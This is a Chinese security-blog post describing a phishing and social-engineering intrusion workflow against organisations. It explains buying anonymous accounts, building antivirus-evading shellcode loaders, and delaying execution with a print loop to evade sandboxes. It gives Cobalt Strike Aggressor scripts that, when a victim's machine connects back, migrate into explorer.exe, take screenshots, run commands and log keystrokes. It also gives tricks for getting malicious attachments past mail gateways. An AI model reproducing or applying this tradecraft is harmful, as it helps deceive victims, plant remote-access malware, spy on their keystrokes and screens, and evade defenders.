社工钓鱼基本流程+思维导图

VSole2023-10-08 10:29:47

前言

穷则社工钓鱼,达则0day炸场-微步在线,借用微步公众号的一句话,没有后端资源支持的情况下,社工钓鱼必学技能,毕竟正面打不动,代码审不动,0day又没有是日常,下文讲解自己对于社工钓鱼的思路。

社交账号

准备一些社交账号,如微信、QQ、脉脉、BOSS直聘、猎聘,手机号可以购买阿里小号/和多号。其中微信可以用辅助注册或者阿里小号/和多号注册,如果你有匿名的渠道购买更好。

邮箱方面,一般常用QQ邮箱、163邮箱,这些目前还是有渠道可以购买的,没钱或者担心购买不可靠,跟身边亲朋好友借也行。

免杀马

免杀的马子是必备的,如果你是和我一样的免杀弟弟,我推荐先学习shellcode loader的一些编写思路


https://github.com/xf555er/ShellcodeLoader

基本加载器思路为shellcode申请内存(可读可写) -> 载入内存 -> 执行内存

申请内存:VirtualAlloc载入内存:memcpy执行内存:CreateThread WaitForSingleObject

针对这三个过程可以使用不同的函数来达到规避杀软的效果,例如申请内存还可以用GlobalAlloc、CoTaskMemAlloc函数,执行内存可以用回调函数EnumFontsW、EnumUILanguages、EnumFontFamiliesA。

主要还是查文档自己多动手,学完就算不会写免杀马,改改别人GitHub的马子,过国内360火绒基本没问题,然后就是研究下捆绑exe释放正常文件,搞不懂直接给马子弹个框文件已损坏,无法打开也行,不然经常出现对方问你这文件怎么打不开...

平时钓鱼的马子经常要改图标加签名之类的,推荐如下项目,在原项目360QVM_bypass的基础上,进行修改增加签名功能。


https://github.com/S9MF/my_script_tools/blob/main/360QVM_bypass-public/README.md

bypass沙箱

为了延长马子存活时间,基本的沙箱对抗少不了,毕竟有防守人员的话,你投递的木马基本都得沙箱走一走,以微步沙箱为例,最简单的循环打印。

使用sleep函数延迟执行容易被hook,修改为0,可以编写循环打印来延迟程序时间,来绕过沙箱检测,因为沙箱运行程序是有时间限制的。


//循环打印进行延时 运行1m2s后执行shellcode 沙箱分析时间没那么久 可以绕过沙箱检测func add() {    start := time.Now() //获取当前时间    //1000000  1m2.793228s    sum, i := 0, 1    for i < 1000000 {        fmt.Println(i)        sum += i        i++    }    elapsed := time.Since(start)    fmt.Println("该函数执行完成耗时:", elapsed)}

将如上代码放在shellcode执行前就行。

信息收集

思维导图如下,每个人都有自己的思路,我就简单讲解几个。

零零信安直接搜索公司名称,得到一些邮箱地址

拿邮箱后缀+关键字去微信搜一搜,Google、百度等搜索引擎也可以搜,可以获取业务招聘相关邮箱信息、手机号等。

如下组合:

@xxx.com 招聘 @xxx.com 校招 @xxx.com 投标 @xxx.com 联系方式

C2搭建准备

常用的就cs,基本的套层CDN然后c2上线端口反代下,这里我会用到cs插件脚本


https://github.com/S9MF/my_script_tools/blob/main/CS%E6%8F%92%E4%BB%B6/README.md


常用的就是上线提醒、自动迁移进程


#自动迁移进程    sub callback{        $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';        # 要迁移的进程        $listener = "ecloud";        # 监听器名字,此处为ecloud,记得修改为自己的        if ($2 ismatch $regex){            $pid = matched()[1];            $inject_pid = $pid;            if (-is64 $1){                $arch = "x64";            }            else{                $arch = "x86";            }            binject($1, $pid, $listener, $arch);        }    }    if($inject_pid != beacon_info($1,"pid")){        bps($1, &callback);    }

还有上线自动截图功能,就算目标掉了起码还有张图证明上线过


#只截一张图    #binput($1, "screenshot");    #bscreenshot($1);
    #连续截图    binput($1, "screenwatch");    bscreenwatch($1);

其他的上线自动执行shell命令、键盘记录看自己需求吧


#执行自定义cmd命令    bshell($1, "ipconfig /all");    #键盘记录    bkeylogger($1);

还有其他需求可以去翻翻文档Aggressor Script


https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor_script.htm

如果你有好用稳定的权限提升维持工具、如Bypass UAC、以及计划任务、服务,可以考虑下写个cs脚本上线自动bypass uac,加权限维持。

邮件网关/沙箱

默认对面有邮件网关/沙箱设备,针对邮件正文和附件要有一定处理或者技巧。

针对正文

  • 不带知名公司名称如脉脉、BOSS直聘不然容易被当成广告邮件,不把附件解密密码放在正文,容易被沙箱识别密码分析附件。

针对附件

  • 文件名加密,解压密码写在附件名上。

开钓

通过之前的准备,我们已经有了一些可供尝试的信息,此时需要构建话术剧本然后去钓鱼。

上线后的操作

参考L33h0m师傅的文章:分享我的CS钓鱼流程导图(权限维持+信息收集+后渗透阶段)


https://www.t00ls.com/articles-69037.html

总结

本文讲解了我对社工钓鱼的基本流程,偏向于思路,师傅们有其他思路欢迎在评论区留言,学习交流。

免杀沙箱
本作品采用《CC 协议》,转载必须注明作者和本文链接
最近在研究这一块的知识,说到肯定就逃不过沙箱。对于沙箱的通俗理解就是一个安全的箱子,这个箱子能够模拟出软件执行苏需要的环境(如模拟虚拟机环境),通过hook跳转到自己的函数进行行为分析。所以我们的后门文件想要更好的躲避软的查杀,首先肯定要做好反调试才能在对抗软时后顾无忧。本文基于自己学习过程中的一些知识进行了总结,不足之处还请师傅们提出。
前言最近在研究这一块的知识,说到肯定就逃不过沙箱。所以我们的后门文件想要更好的躲避软的查杀,首先肯定要做好反调试才能在对抗软时后顾无忧。本文基于自己学习过程中的一些知识进行了总结,不足之处还请师傅们提出。
软浅析
2021-11-18 13:08:56
本文将和大家一起浅析常见的软,如有不足之处还请师傅们指出,谢谢大家。
知识汇总
2021-08-25 23:11:00
知识汇总
0X01起源在攻防演练中通过运行恶意代码连接C2是最常用的手段,但是由于对抗程度的提升。以360、天擎为代表的杀毒软件针对信任链的检测,已经变得愈来愈成熟。这里我们可以理解为,攻击者通过利用"白加黑"这种攻击方法。当攻击者通过社工钓鱼的手段,使得目标下载恶意的文件到目标自己的计算机上,并点击运行白文件时,该文件会在运行时执行恶意DLL。
CS姿势
2022-08-02 16:42:30
花指令,在程序 shellcode 或特征代码区域增添垃圾指令,增加的垃圾指令不会影响文件执行,在动态查杀或者文件hash对比是校验会不一致。加壳,比如upx加壳等,一般文件落地后对比哈希值也可绕过软。二次编译,一般用于对shellcode进行二次编译bypass软。安装火绒,查杀CS上线加壳另外再加壳测试。赛门铁克也未报毒,其它软不放图了。
近年来,大量的后渗透利用(Post-Exploitation)工具包、自定义恶意软件和开源远程控制木马(RAT)等具备丰富的检测规避技术和反溯源能力的工具,活跃于各种实战对抗演练、勒索攻击甚至是具有国家背景的APT攻击之中。入侵者可以运用这类工具进行终端行为以及网络通信流量的
对于很多大佬来说肯定是十分熟悉的,弟弟我只能简单的介绍下其简介: cs拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,cs还可以调用Mimikatz等其他知名工具。0x03 实践说的再多也不如拿真实情况来说话,实践主要对上述的六种工具做下简单的使用,并利用线上沙箱进行简单的查杀检测。接下来主要以3.12为主。
可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可,也可以直接在文末获取下载地址转储 LSASS
VSole
网络安全专家